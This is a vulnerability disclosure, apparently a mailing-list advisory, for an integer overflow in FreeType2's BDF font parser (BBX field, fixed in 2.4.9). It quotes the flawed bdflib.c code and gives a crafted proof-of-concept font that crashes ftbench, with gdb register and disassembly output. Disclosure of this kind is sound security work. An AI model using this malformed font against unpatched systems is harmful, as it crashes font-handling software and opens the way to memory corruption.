FREETYPE2 BDF font integer overflow in BBX field

FREETYPE2 BDF font integer overflow in BBX field

 

Byoungyoung Lee

http://twitter.com/mylifeasageek

http://exploitshop.wordpress.com

 

FREETYPE2 has an integer overflow in handling BBX field. Because this overflow results in allocating much smaller size of buffer and this buffer will be filled with user-controlled buffer, it would be possible to execute the arbitrary codes. This is patched in Freetype2 2.4.9 (http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=c4cad30ed1b1f554aa41a98b0b0fdca6e579e22f).

 

You can download the PoC at http://www.cc.gatech.edu/~blee303/exploit/freetype2_bdf/bbx.bdf.

 

In bdflib.c ,

     /* Allocate enough space for the bitmap. */

     glyph->bpr = ( glyph->bbx.width * p->font->bpp + 7 ) >> 3;

 

     bitmap_size = glyph->bpr * glyph->bbx.height;

     if ( bitmap_size > 0xFFFFU )

     {

       FT_ERROR(( "_bdf_parse_glyphs: " ERRMSG4, lineno ));

       error = BDF_Err_Bbx_Too_Big;

       goto Exit;

     }

     else

       glyph->bytes = (unsigned short)bitmap_size;

 

     if ( FT_NEW_ARRAY( glyph->bitmap, glyph->bytes ) )

       goto Exit;

 

1. "p->font->bpp" can be set as 0x10. "glyph->bbx.width" and

"glyph->bbx.height" are a short variable.

2. "glyph->bpr" will be little bit larger than a short value 3. When

computing bitmap_size, there could be overflows while still bypasses the

check (bitmap_size>0xFFFFU).

4. guess there should be the check for "glyph->bpr" as well.

 

lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ cat ./sample.bdf

STARTFONT

2.1 FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1

SIZE 16 75 75 100

FONTBOUNDINGBOX 16 16 0 -2

STARTPROPERTIES 2

FONT_ASCENT 14

FONT_DESCENT 2

ENDPROPERTIES

CHARS 1

STARTCHAR U+0041

ENCODING 65

SWIDTH 50 0

DWIDTH 8 0

BBX 53768 39940 0 -2

BITMAP

00

01

02

03

04

05

06

07

08

09

10

11

12

13

14

00

ENDCHAR

ENDFONT

 

lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ ./ftbench -c 1 ./sample.bdf

Segmentation fault

 

lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ gdb -q ./ftbench Reading

symbols from /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench...(no

debugging symbols found)...done.

(gdb) r -c 1 ./sample.bdf

Starting program: /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench

-c 1 ./sample.bdf

 

Program received signal SIGSEGV, Segmentation fault.

0x080866bf in _bdf_parse_glyphs ()

(gdb) info reg

eax            0x810d078        135319672

ecx            0x0      0

edx            0xff     255

ebx            0xff     255

esp            0xbffff320       0xbffff320

ebp            0xbffff398       0xbffff398

esi            0x0      0

edi            0x0      0

eip            0x80866bf        0x80866bf <_bdf_parse_glyphs+2131>

eflags         0x210202 [ IF RF ID ]

cs             0x73     115

ss             0x7b     123

ds             0x7b     123

es             0x7b     123

fs             0x0      0

gs             0x33     51

(gdb) x/5i 0x080866bf

=> 0x80866bf <_bdf_parse_glyphs+2131>:  movzbl (%eax),%eax

  0x80866c2 <_bdf_parse_glyphs+2134>:  mov    %eax,%edx

  0x80866c4 <_bdf_parse_glyphs+2136>:  shl    $0x4,%edx

  0x80866c7 <_bdf_parse_glyphs+2139>:  mov    -0x20(%ebp),%eax

  0x80866ca <_bdf_parse_glyphs+2142>:  movzbl 0x80bcfc0(%eax),%eax